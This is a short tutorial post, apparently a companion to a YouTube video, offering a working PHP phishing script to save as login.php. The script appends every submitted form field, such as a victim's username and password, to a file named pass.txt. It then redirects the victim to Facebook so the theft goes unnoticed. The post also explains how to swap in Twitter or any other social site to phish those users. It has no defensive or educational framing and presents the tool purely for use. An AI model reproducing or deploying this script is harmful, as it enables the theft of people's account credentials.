Hello friends,
So from here you can copy .php script
<?php
header ('Location: http://Facebook.com/');
$handle = fopen("pass.txt", "a");
$value = "next";
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Copy this script and save this in a file with a name of login.php
So you successfully created your 2 files. For next steps continue my youtube video.
You can change this script. If you want to create other social platform phishing link so you can delete http://Facebook.com and write http://Twitter.com so you get Twitter phishing link. Hence you can create any social site phishing link.
Thanks for visiting here !!